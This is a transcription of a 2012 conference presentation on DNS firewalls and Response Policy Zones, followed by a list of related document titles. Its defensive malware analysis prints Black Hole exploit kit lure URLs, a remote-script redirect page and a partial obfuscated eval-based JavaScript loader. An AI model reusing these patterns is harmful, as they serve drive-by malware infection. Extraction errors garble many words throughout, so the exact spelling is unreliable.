Using the DNS as a Hammer The Good, the Bad and the Ugly
|
|
|
- Robert Houston
- 9 years ago
- Views:
Transcription
1 Using the DNS as a Hammer The Good, the Bad and the Ugly SATIN March 22, 2012
2 March 22, 2012, SATIN Conference
3 March 22, 2012, SATIN Conference
4 Presenter: Rod Rasmussen Rod.Rasmussen<at>InternetIdenBty.com President & CTO Internet IdenBty Co- Chair APWG Internet Policy CommiOee Recently joined SSAC AcBve member FIRST, MAAWG, DNS- OARC, Digital Phish- Net, RISG, OTA FCC CSRIC
5 State of Play Malicious domains/hosts created regularly Heavy abuse conbnues usually registrar specific malware the driver today Enterprises aoacked stealthily via hostnames (Aurora, Night Dragon, Shady RAT) Governments have discovered the DNS RIAA, MPAA, trademark/ip holders have discovered the DNS
6 Nails Malware C&C s Phishing domains Mule sites Counterfeit Goods Piracy Trademark infringement AnB- government sites Dissidents
7 The Hammer Recursive DNS servers Blocking domains/hostnames Filtering/redirecBng domains/hostnames DiOo with IP addresses via reverse resolubon Specialized nameserver so_ware or add- ons BIND RPZ s Think of this as a DNS Firewall
8 How to use the Hammer Simple really: pre- load the cache with the responses you want to give and keep them there Done regularly for various roubng/internal uses Many ways to get entries in there Can synthesize values or NX a responses Also seen some nasty CNAME stuff Get lists of hostnames to block from somewhere RPZs make this trivial, secure, and very scalable
9 RPZ Response Policy Zones Most new domain names are malicious. I am stunned by the simplicity and truth of that observabon. Every day lots of new names are added to the global DNS, and most of them belong to scammers, spammers, e- criminals, and speculators. Domains are cheap, domains are plenbful, and as a result most of them are dreck or worse. Paul Vixie "Taking Back the DNS July 30, 2010 hop:// RPZ (Response Policy Zones) the result Any BIND resolver can easily implement large- scale domain block lists Scalable: Several lists, different policies per list Fast: AutomaBcally updated with real- Bme data
10 PerspecBve is Key ProtecBng what? Enterprise network CriBcal infrastructure ISP customer base ProtecBng for whom? Your own network/employees Customers Government IP holders
11 What is the User IncenBve? Work for a company with sensibve data Don t want to lose their own PII Don t want to have computer infected Keep kids away from certain content Don t want to overpay for music/movies Want to buy stuff that s not quite legal (gray) Want to speak out against the government Want to start a revolubon
12 User and Network Operator Goals Must be aligned Alignment = use of filtering/blocking Non- alignment leads to user non- acceptance AlternaBve DNS solubons available AlternaBves to DNS itself available Users will forego protecbon against some threats (malware) to achieve their own goals (cheap music)
13 Worst- case Scenarios Rampant use of alternate, unsafe DNS servers Rise of shady so_ware that allows circumvenbon potenbally opening up new exploits Split root
14
15 The Good There would be a really cool picture of Clint Eastwood here from the movie, but I didn t want to get sued by MGM
16 Enterprises and Government Users Constant assault these days 2011 year of the data breach Spear phishing, malware via e- mail/social engineering Hacking and silent extracbon of data (aka APT) Criminal and nabon state actors Most aoacks leverage hostnames ExfiltraBon via vicbm.badguydomain.tld DUH! Plenty of data available, but not implemented at the perimeter Time to install a DNS Firewall
17 Very Tight ProtecBon Possible Enterprises have alignment with users Can dictate port 53 policy all users must use DNS Firewall recursive servers Via VPN for remote users Many solubons and list sources available Can use DNS resolubon logging to detect anomalies Previously unknown malware/data exfiltrabon DNS tunneling and malware C&C via the DNS
18 The Bad There would be a really cool picture of Lee Van Cleef here from the movie, but I didn t want to get sued by MGM
19 SOPA/PIPA and Other US LegislaBon High profile legislabon in US that would require ISPs to block domains at resolvers due to lack of acbon by other countries Agree with it or not, lack of process and/or response to long- standing issues has allowed advocates to pursue this avenue Supported by IP holders with strong backing Off the table for now, but certainly not dead
20 Worldwide Regulatory Impacts Similar effect legislabon being adopted/discussed throughout Europe Italy - > led to large- scale adopbon of alternate DNS France - > varied approach/results ACTA (not truly equivalent, but Anon thinks so ) Popping up around the world Some countries run nabonal firewalls and filtering and have for years Real implicabons for all recursive DNS operators
21 Why this doesn t work Users want the blocked content AlternaBve methods exist to get it IP address based resources you do remember that DNS just maps names to IPs right? AlternaBve DNS servers abound ISPs cannot force port 53 (anb- compebbve) DNS can use other ports, proxies Proxy servers for web and other content Breaks DNSSEC (well it will at some point)
22 The Ugly There would be a really cool picture of Eli Wallach here from the movie, but I didn t want to get sued by MGM
23 DNSSEC May Will Break Currently not an issue with recursive server level validabon Will be a major problem with endpoint validabon DNS Firewall responses are lies and DNSSEC doesn t like being lied to Will find alternabve validabon method and sbll get to the bad hostname This needs to be fixed for compabbility
24 The Other
25 Complex aoacks using evil domains The game is changing significantly Redirects for drive- by- downloads ObfuscaBon and hiding techniques ACL s to prevent responders from seeing issues Malware rendezvous and C&C hidden in code Abuse of whois privacy to shield criminal registrabons (ICANN studies underway) Criminals use of automated domain registrabon processes built into the malware control panel DGA for automated botnet reconnecbons
26 Sample: Black Hole Exploit Site Massive phishy spam campaigns Lures lead to compromised sites Redirect to other sites Eventual landing page uses tricks to exploit browser bugs and infect machine RedirecBon is obfuscated hard to know what domains are involved.
27 Lure e- mail Obfuscated URL: hxxp://stonehengeroofingproducts.com/emngorgc/index.html DO NOT GO TO THAT SITE WITH A WINDOWS MACHINE!!!!
28 What you get
29 First Lure Site Hacked server needs fixing Redirects to further hacked servers Modified to prevent infecbon! <html> <h1>wait PLEASE</h1> <h3>loading...</h3> <script type="text/javascript" src= hxxp://skodamene.no/clftseyg/js.js"></script> <script type="text/javascript" src= hxxp://bendabebemimos.com/jhgfzcjv/js.js"></script> <script type="text/javascript" src= hxxp://produccionesqueens.com/acfv9bml/js.js"></script> <script type="text/javascript" src= hxxp://purchasemiraclemineral.info/yxcrbqxk/js.js"></script> <script type="text/javascript" src= hxxp://successwithso_ware.com/49qkhzro/js.js"></script> <script type="text/javascript" src= hxxp://thefocuspointphotography.com/jnzxp3ea/js.js"></script> </html>
30 Intermediate Site hxxp://skodamene.no/clftseyg/js.js Another hacked site that needs cleanup Contents simply redirect elsewhere document.locabon= hxxp://hakkaboat.com/search.php?page=73a07bcb51f4be71';
31 Actual InfecBon Site hxxp://hakkaboat.com/search.php? Domain is owned by criminal Go there directly and you end up at Google Exploits various browser flaws Eventually downloads Zeus That version of Zeus controlled by several criminally controlled domains that need to be suspended as well
32 Obfuscated Code on Exploit Site <html><body><script> if(window.document) a=([].unshi_+16).substr(1,3); aa=([].unshi_+ [].unshi_).substr(1,3); if(a===aa) f={q: ["59'70'58'76'68'60'69'75'5'78'73'64'75'60'- 1'- 2'19'58'60'69'75'60'73'21'19'63'8'21'39'67'6 0'56'74'60'- 9'78'56'64'75'- 9'71'56'62'60'- 9'64'74'- 9'67'70'56'59'64'69'62'5'5'5'19'6'63'8'21' 19'6'58'60'69'75'60'73'21'19'63'73'21'- 2'0'18'61'76'69'58'75'64'70'69'- 9'60'69'59'54'73'60' 59'64'73'60'58'75'- 1'0'82'78'64'69'59'70'78'5'67'70'58'56'75'64'70'69'5'63'73'60'61'20'- Deleted 1000s of lines of code '- 1'60'69'59'54'73'60'59'64'73'60'58'75'3'15'7'7'7'0'18'84'74'71'67'7'- 1'0'18"][0]}.q.split ("'"); md='a'; e=eval; w=f; s=''; f='f'; st=e("s".concat("tri","ng")); for(i=0;i<w.length;i++) { z=w[i]; s=s.concat(st[f+'romcharcod'+'e'](41+parseint(z))); } q={run:{run:funcbon(w){e (w)}}}; q['run']['ru'+'n'](s); </script></body></html> Ge ng these shut down is HARD!
33 DNS Firewalls Easily Block These Can implement a block/redirect as soon as new exploit site idenbfied Users clicking on e- mails will never get to eventual drop site Many techniques ID bad domains prior to use Passive DNS Nameserver monitoring RegistraBon data for new domains
34 A Recent QuesBon on.su High levels of abuse on a TLD lead to potenbal full block by major organizabon Answer was, yeah, probably worth it Abuse.ch recommends blocking the enbre.su TLD: hop://
35 Wrap- up We have a variety of issues that appear to some to all be nails DNS provides an effecbve hammer If your goals are aligned (enterprise, anb- malware) Will smash your thumb if users don t want to be redirected or blocked Issues with DNSSEC need to be addressed long- term We will see a lot of this Bme to get it right is now!
36 Thank You! Now for your quesbons
37 Using the DNS as a Hammer The Good, the Bad and the Ugly SATIN March 22, 2012
DNS Firewalls with BIND: ISC RPZ and the IID Approach. Tuesday, 26 June 2012
DNS Firewalls with BIND: ISC RPZ and the IID Approach Tuesday, 26 June 2012 1 About the Presenters»»» Paul Vixie Chairman and Founder Internet Systems Consortium Rod Rasmussen President and CTO IID (Internet
FAQ (Frequently Asked Questions)
FAQ (Frequently Asked Questions) Specific Questions about Afilias Managed DNS What is the Afilias DNS network? How long has Afilias been working within the DNS market? What are the names of the Afilias
DNS RPZ in the Swiss NREN
DNS RPZ in the Swiss NREN First-hand experiences after half a year of productive usage Matthias Seitz [email protected] Tallinn, 25 th of September 2015 Agenda What is DNS RPZ? Timeline of the project
CYBERSECURITY INESTIGATION AND ANALYSIS
CYBERSECURITY INESTIGATION AND ANALYSIS The New Crime of the Digital Age The Internet is not just the hotspot of all things digital and technical. Because of the conveniences of the Internet and its accessibility,
WHITEPAPER. How a DNS Firewall Helps in the Battle against Advanced Persistent Threat and Similar Malware
WHITEPAPER How a DNS Firewall Helps in the Battle against Advanced Persistent Threat and Similar Malware How a DNS Firewall Helps in the Battle against Advanced As more and more information becomes available
WE KNOW IT BEFORE YOU DO: PREDICTING MALICIOUS DOMAINS Wei Xu, Kyle Sanders & Yanxin Zhang Palo Alto Networks, Inc., USA
WE KNOW IT BEFORE YOU DO: PREDICTING MALICIOUS DOMAINS Wei Xu, Kyle Sanders & Yanxin Zhang Palo Alto Networks, Inc., USA Email {wei.xu, ksanders, yzhang}@ paloaltonetworks.com ABSTRACT Malicious domains
We Know It Before You Do: Predicting Malicious Domains
We Know It Before You Do: Predicting Malicious Domains Abstract Malicious domains play an important role in many attack schemes. From distributing malware to hosting command and control (C&C) servers and
Configuring a Domain to work with your Server
Configuring a Domain to work with your Server If you have a domain name registered with a third party and would like to use that domain with your Tagadab server (Virtual or Dedicated) then you have several
Response Policy Zones
Response Policy Zones Taking Back the DNS, V2.0 Paul Vixie Chairman and Chief Scientist Internet Systems Consortium Abstract DNS works as well for the bad guys (criminals, spammers, spies) as for respectable
Malware & Botnets. Botnets
- 2 - Malware & Botnets The Internet is a powerful and useful tool, but in the same way that you shouldn t drive without buckling your seat belt or ride a bike without a helmet, you shouldn t venture online
Practical Usage of Passive DNS Monitoring for E-Crime Investigations
Practical Usage of Passive DNS Monitoring for E-Crime Investigations Rod Rasmussen President & CTO, Internet Identity rod.rasmussen internetidentity.com Topics Passive DNS overview Use Cases Challenges
LASTLINE WHITEPAPER. Using Passive DNS Analysis to Automatically Detect Malicious Domains
LASTLINE WHITEPAPER Using Passive DNS Analysis to Automatically Detect Malicious Domains Abstract The domain name service (DNS) plays an important role in the operation of the Internet, providing a two-way
Defend Your Network with DNS Defeat Malware and Botnet Infections with a DNS Firewall
Defeat Malware and Botnet Infections with a DNS Firewall By 2020, 30% of Global 2000 companies will have been directly compromised by an independent group of cyberactivists or cybercriminals. How to Select
Defend Your Network with DNS Defeat Malware and Botnet Infections with a DNS Firewall
Defeat Malware and Botnet Infections with a DNS Firewall By 2020, 30% of Global 2000 companies will have been directly compromised by an independent group of cyberactivists or cybercriminals. How to Select
Exploring the Black Hole Exploit Kit
Exploring the Black Hole Exploit Kit Updated December 20, 2011 Internet Identity Threat Intelligence Department http://www.internetidentity.com http://www.internetidentity.com 12/29/11 Page 1/20 Summary
DNS Traffic Monitoring. Dave Piscitello VP Security and ICT Coordina;on, ICANN
DNS Traffic Monitoring Dave Piscitello VP Security and ICT Coordina;on, ICANN Domain Names ICANN coordinates the administra2on of global iden2fier systems Domain names provide user friendly identification
CENSURFRIDNS a.k.a. UNCENSOREDDNS. Thomas Steen Rasmussen [email protected]
CENSURFRIDNS a.k.a. UNCENSOREDDNS Thomas Steen Rasmussen [email protected] Agenda Introduction DNS blocking in Denmark What is UncensoredDNS? Why was it started? Issues with DNS blocking A basic conflict:
How To Filter Email From A Spam Filter
Spam Filtering A WORD TO THE WISE WHITE PAPER BY LAURA ATKINS, CO- FOUNDER 2 Introduction Spam filtering is a catch- all term that describes the steps that happen to an email between a sender and a receiver
Acceptable Use Policy and Terms of Service
Acceptable Use Policy and Terms of Service Vox Populi Registry Ltd. 3-110 Governors Square 23 Lime Tree Bay Ave. Grand Cayman, Cayman Islands PO Box 1361, George Town, KY1-1108 www.nic.sucks Version 1.0
Doris Yang [email protected] Vectra Networks, Inc. June 16, 2015 The World Ahead
Doris Yang [email protected] Vectra Networks, Inc. 1 June 16, 2015 The World Ahead June 16, 2015 The World Ahead Disclaimer The views and opinions expressed during this conference are those of the
Security Incidents And Trends In Croatia. Domagoj Klasić [email protected]
Security Incidents And Trends In Croatia Domagoj Klasić [email protected] Croatian National CERT About us Founded in 2008. in accordance with the Information Security Act We are a department of the Croatian
Surveying the DNS Threat Landscape by Rod Rasmussen and Paul Vixie
Surveying the DNS Threat Landscape by Rod Rasmussen and Paul Vixie Executive summary Strong enterprise security in 2013 requires a multilayered Internet strategy that includes the monitoring of network
Defending your DNS in a post-kaminsky world. Paul Wouters <[email protected]>
Defending your DNS in a post-kaminsky world Paul Wouters Overview History of DNS and the Kaminsky attack Various DNS problems explained Where to address the DNS problem Nameservers,
Measures to Protect (University) Domain Registrations and DNS Against Attacks. Dave Piscitello, ICANN [email protected]
Measures to Protect (University) Domain Registrations and DNS Against Attacks Dave Piscitello, ICANN [email protected] Why are we talking about Domain names and DNS? Domain names and URLs define
WEB ATTACKS AND COUNTERMEASURES
WEB ATTACKS AND COUNTERMEASURES February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in
Software that provides secure access to technology, everywhere.
Software that provides secure access to technology, everywhere. Joseph Patrick Schorr @JoeSchorr October, 2015 2015 BOMGAR CORPORATION ALL RIGHTS RESERVED WORLDWIDE 1 Agenda What are we dealing with? How
Anti-Phishing Best Practices for ISPs and Mailbox Providers
Anti-Phishing Best Practices for ISPs and Mailbox Providers Version 2.01, June 2015 A document jointly produced by the Messaging, Malware and Mobile Anti-Abuse Working Group (M 3 AAWG) and the Anti-Phishing
N-CAP Users Guide Everything You Need to Know About Using the Internet! How Firewalls Work
N-CAP Users Guide Everything You Need to Know About Using the Internet! How Firewalls Work How Firewalls Work By: Jeff Tyson If you have been using the internet for any length of time, and especially if
Spear Phishing Attacks Why They are Successful and How to Stop Them
White Paper Spear Phishing Attacks Why They are Successful and How to Stop Them Combating the Attack of Choice for Cybercriminals White Paper Contents Executive Summary 3 Introduction: The Rise of Spear
5 DNS Security Risks That Keep You Up At Night (And How To Get Back To Sleep)
5 DNS Security Risks That Keep You Up At Night (And How To Get Back To Sleep) survey says: There are things that go bump in the night, and things that go bump against your DNS security. You probably know
Securing Your Business s Bank Account
Commercial Banking Customers Securing Your Business s Bank Account Trusteer Rapport Resource Guide For Business Banking January 2014 Table of Contents 1. Introduction 3 Who is Trusteer? 3 2. What is Trusteer
Using big data analytics to identify malicious content: a case study on spam emails
Using big data analytics to identify malicious content: a case study on spam emails Mamoun Alazab & Roderic Broadhurst [email protected] http://cybercrime.anu.edu.au 2 Outline Background Cybercrime
GlobalSign Malware Monitoring
GLOBALSIGN WHITE PAPER GlobalSign Malware Monitoring Protecting your website from distributing hidden malware GLOBALSIGN WHITE PAPER www.globalsign.com CONTENTS Introduction... 2 Malware Monitoring...
Securing Cloud-Based Email
White Paper Securing Cloud-Based Email A Guide for Government Agencies White Paper Contents Executive Summary 3 Introduction 3 The Risks Posed to Agencies Running Email in the Cloud 4 How FireEye Secures
DNS Response Policy Zone (DNSRPZ)
The image cannot be displayed. Your computer may not have enough memory to open the image, or the image may have been corrupted. Restart your computer, and then open the file again. If the red x still
Lesson 13: DNS Security. Javier Osuna [email protected] GMV Head of Security and Process Consulting Division
Lesson 13: DNS Security Javier Osuna [email protected] GMV Head of Security and Process Consulting Division Introduction to DNS The DNS enables people to use and surf the Internet, allowing the translation
Cybersecurity: An Innovative Approach to Advanced Persistent Threats
Cybersecurity: An Innovative Approach to Advanced Persistent Threats SESSION ID: AST1-R01 Brent Conran Chief Security Officer McAfee This is who I am 2 This is what I do 3 Student B The Hack Pack I used
SECURITY REIMAGINED SPEAR PHISHING ATTACKS WHY THEY ARE SUCCESSFUL AND HOW TO STOP THEM. Why Automated Analysis Tools are not Created Equal
WHITE PAPER SPEAR PHISHING ATTACKS WHY THEY ARE SUCCESSFUL AND HOW TO STOP THEM Why Automated Analysis Tools are not Created Equal SECURITY REIMAGINED CONTENTS Executive Summary...3 Introduction: The Rise
Zscaler Internet Security Frequently Asked Questions
Zscaler Internet Security Frequently Asked Questions 1 Technical FAQ PRODUCT LICENSING & PRICING How is Zscaler Internet Security Zscaler Internet Security is licensed on number of Cradlepoint devices
ZNetLive Malware Monitoring
Introduction The criminal ways of distributing malware or malicious software online have gone through a change in past years. In place of using USB drives, attachments or disks to distribute viruses, hackers
Transferring Hosting to Fasthosts
Fasthosts Customer Support Transferring Hosting to Fasthosts This guide will show you how to transfer hosting to Fasthosts from another provider Customer Support Transferring Hosting to Fasthosts Contents
Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?
Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? This paper presents a scenario in which an attacker attempts to hack into the internal network
Domain Name Abuse Detection. Liming Wang
Domain Name Abuse Detection Liming Wang Outline 1 Domain Name Abuse Work Overview 2 Anti-phishing Research Work 3 Chinese Domain Similarity Detection 4 Other Abuse detection ti 5 System Information 2 Why?
QUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY
QUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY EXPLOIT KITS UP 75 PERCENT The Infoblox DNS Threat Index, powered by IID, stood at 122 in the third quarter of 2015, with exploit kits up 75 percent
Architecture. The DMZ is a portion of a network that separates a purely internal network from an external network.
Architecture The policy discussed suggests that the network be partitioned into several parts with guards between the various parts to prevent information from leaking from one part to another. One part
FSOEP Web Banking & Fraud: Corporate Treasury Attacks
FSOEP Web Banking & Fraud: Corporate Treasury Attacks Your Presenters Who Are We? Tim Wainwright Managing Director Chris Salerno Senior Consultant Led 200+ penetration tests Mobile security specialist
Hosting more than one FortiOS instance on. VLANs. 1. Network topology
Hosting more than one FortiOS instance on a single FortiGate unit using VDOMs and VLANs 1. Network topology Use Virtual domains (VDOMs) to divide the FortiGate unit into two or more virtual instances of
Description: Objective: Attending students will learn:
Course: Introduction to Cyber Security Duration: 5 Day Hands-On Lab & Lecture Course Price: $ 3,495.00 Description: In 2014 the world has continued to watch as breach after breach results in millions of
How Attackers are Targeting Your Mobile Devices. Wade Williamson
How Attackers are Targeting Your Mobile Devices Wade Williamson Today s Agenda Brief overview of mobile computing today Understanding the risks Analysis of recently discovered malware Protections and best
Phishing Activity Trends Report for the Month of December, 2007
Phishing Activity Trends Report for the Month of December, 2007 Summarization of December Report Findings The total number of unique phishing reports submitted to APWG in December 2007 was 25,683, a decrease
IT TRENDS AND FUTURE CONSIDERATIONS. Paul Rainbow CPA, CISA, CIA, CISSP, CTGA
IT TRENDS AND FUTURE CONSIDERATIONS Paul Rainbow CPA, CISA, CIA, CISSP, CTGA AGENDA BYOD Cloud Computing PCI Fraud Internet Banking Questions The Mobile Explosion Mobile traffic data in 2011 was nearly
SAC 025 SSAC Advisory on Fast Flux Hosting and DNS
Fast and Double Flux Attacks 1 SAC 025 SSAC Advisory on Fast Flux Hosting and DNS An Advisory from the ICANN Security and Stability Advisory Committee (SSAC) January 2008 Fast and Double Flux Attacks 2
INCREASINGLY, ORGANIZATIONS ARE ASKING WHAT CAN T GO TO THE CLOUD, RATHER THAN WHAT CAN. Albin Penič Technical Team Leader Eastern Europe
INCREASINGLY, ORGANIZATIONS ARE ASKING WHAT CAN T GO TO THE CLOUD, RATHER THAN WHAT CAN Albin Penič Technical Team Leader Eastern Europe Trend Micro 27 years focused on security software Headquartered
VIDEO Intypedia013en LESSON 13: DNS SECURITY. AUTHOR: Javier Osuna García-Malo de Molina. GMV Head of Security and Process Consulting Division
VIDEO Intypedia013en LESSON 13: DNS SECURITY AUTHOR: Javier Osuna García-Malo de Molina GMV Head of Security and Process Consulting Division Welcome to Intypedia. In this lesson we will study the DNS domain
DNS. The Root Name Servers. DNS Hierarchy. Computer System Security and Management SMD139. Root name server. .se name server. .
Computer System Security and Management SMD139 Lecture 5: Domain Name System Peter A. Jonsson DNS Translation of Hostnames to IP addresses Hierarchical distributed database DNS Hierarchy The Root Name
Phishing by data URI
Phishing by data URI Henning Klevjer [email protected] October 22, 2012 1 Abstract Historically, phishing web pages have been hosted by web servers that are either compromised or owned by the attacker.
HACKER INTELLIGENCE INITIATIVE. The Secret Behind CryptoWall s Success
HACKER INTELLIGENCE INITIATIVE The Secret Behind 1 1. Introduction The Imperva Application Defense Center (ADC) is a premier research organization for security analysis, vulnerability discovery, and compliance
Internet Security and Resiliency: A Collaborative Effort
Internet Security and Resiliency: A Collaborative Effort Baher Esmat Manager, Regional Relations Middle East MENOG 4 Manama, 9 April 2009 1 WHAT IS THIS PRESENTATION ABOUT? ICANN s effort in enhancing
A host-based firewall can be used in addition to a network-based firewall to provide multiple layers of protection.
A firewall is a software- or hardware-based network security system that allows or denies network traffic according to a set of rules. Firewalls can be categorized by their location on the network: A network-based
Transferring Your Internet Services
Page 1 of 6 Transferring Your Internet Services Below you will find the instructions necessary to move your web hosting, email, and DNS services to NuVox. The Basics Transferring your domain name Preparing
Detect Malware and APTs with DNS Firewall Virtual Evaluation
Summary: Infoblox DNS Firewall provides the industry s first true DNS security solution for protection against malware and advanced persistent threats (APTs). Infoblox DNS Firewall can detect DNS-based
DOMAIN AND EMAIL GLOSSARY The phrases and terms you may encounter, when registering a domain name
DOMAIN AND EMAIL GLOSSARY The phrases and terms you may encounter, when registering a domain name Don t know your Registrar from your Registry? No idea what a Name server actually does? Well, don t worry.
1 2014 2013 Infoblox Inc. All Rights Reserved. Talks about DNS: architectures & security
1 2014 2013 Infoblox Inc. All Rights Reserved. Talks about DNS: architectures & security Agenda Increasing DNS availability using DNS Anycast Opening the internal DNS Enhancing DNS security DNS traffic
Whose IP Is It Anyways: Tales of IP Reputation Failures
Whose IP Is It Anyways: Tales of IP Reputation Failures SESSION ID: SPO-T07 Michael Hamelin Lead X-Force Security Architect IBM Security Systems @HackerJoe What is reputation? 2 House banners tell a story
Unknown threats in Sweden. Study publication August 27, 2014
Unknown threats in Sweden Study publication August 27, 2014 Executive summary To many international organisations today, cyber attacks are no longer a matter of if but when. Recent cyber breaches at large
Why Device Fingerprinting Provides Better Network Security than IP Blocking. How to transform the economics of hacking in your favor
Why Device Fingerprinting Provides Better Network Security than IP Blocking How to transform the economics of hacking in your favor Why Device Fingerprinting Provides Better Network Security than IP Blocking
Libra Esva. Whitepaper. Glossary. How Email Really Works. Email Security Virtual Appliance. May, 2010. It's So Simple...or Is It?
Libra Esva Email Security Virtual Appliance Whitepaper May, 2010 How Email Really Works Glossary 1 2 SMTP is a protocol for sending email messages between servers. DNS (Domain Name System) is an internet
UNCLASSIFIED. http://www.govcertuk.gov.uk. General Enquiries. Incidents [email protected] Incidents [email protected].
Version 1.2 19-June-2013 GUIDELINES Incident Response Guidelines Executive Summary Government Departments have a responsibility to report computer incidents under the terms laid out in the SPF, issued
ACCEPTABLE USE AND TAKEDOWN POLICY
ACCEPTABLE USE AND TAKEDOWN POLICY This Acceptable Use and Takedown Policy ( Acceptable Use Policy ) of Wedding TLD2, LLC (the Registry ), is to be read together with the Registration Agreement and words
Security+ Guide to Network Security Fundamentals, Fourth Edition. Chapter 6 Network Security
Security+ Guide to Network Security Fundamentals, Fourth Edition Chapter 6 Network Security Objectives List the different types of network security devices and explain how they can be used Define network
How to Add Domains and DNS Records
How to Add Domains and DNS Records Configure the Barracuda NextGen X-Series Firewall to be the authoritative DNS server for your domains or subdomains to take advantage of Split DNS or dead link detection.
Protecting Your Organisation from Targeted Cyber Intrusion
Protecting Your Organisation from Targeted Cyber Intrusion How the 35 mitigations against targeted cyber intrusion published by Defence Signals Directorate can be implemented on the Microsoft technology
Decoding DNS data. Using DNS traffic analysis to identify cyber security threats, server misconfigurations and software bugs
Decoding DNS data Using DNS traffic analysis to identify cyber security threats, server misconfigurations and software bugs The Domain Name System (DNS) is a core component of the Internet infrastructure,
DATA SHEET. What Darktrace Finds
DATA SHEET What Darktrace Finds Darktrace finds anomalies that bypass other security tools, due to the uniqueness of the Enterprise Immune System, capable of detecting threats without reliance on rules,
ARP and DNS. ARP entries are cached by network devices to save time, these cached entries make up a table
ARP and DNS Both protocols do conversions of a sort, but the distinct difference is ARP is needed for packet transfers and DNS is not needed but makes things much easier. ARP Address Resolution Protocol
Resilient Botnet Command and Control with Tor
Resilient Botnet Command and Control with Tor Dennis Brown July 2010 10/14/10 1 Who am I? Dennis Brown Security Researcher for Tenable Network Solutions Toorcon 10, 11 Defcon 18 PaulDotCom Podcast Rhode
INFORMATION SECURITY REVIEW
INFORMATION SECURITY REVIEW 14.10.2008 CERT-FI Information Security Review 3/2008 In the summer, information about a vulnerability in the internet domain name service (DNS) was released. If left unpatched,
Methods for Sharing Dynamic IP Address Space Information with Others
MAAWG Recommendation Methods for Sharing Dynamic IP Address Space Information with Others Introduction While MAAWG is on record as recommending that the best option for controlling the flow of unwanted
ANDRA ZAHARIA MARCOM MANAGER
10 Warning Signs that Your Computer is Malware Infected [Updated] ANDRA ZAHARIA MARCOM MANAGER MAY 16TH, 2016 6:05 Malware affects us all The increasing number of Internet users worldwide creates an equal
Setting Up Scan to SMB on TaskALFA series MFP s.
Setting Up Scan to SMB on TaskALFA series MFP s. There are three steps necessary to set up a new Scan to SMB function button on the TaskALFA series color MFP. 1. A folder must be created on the PC and
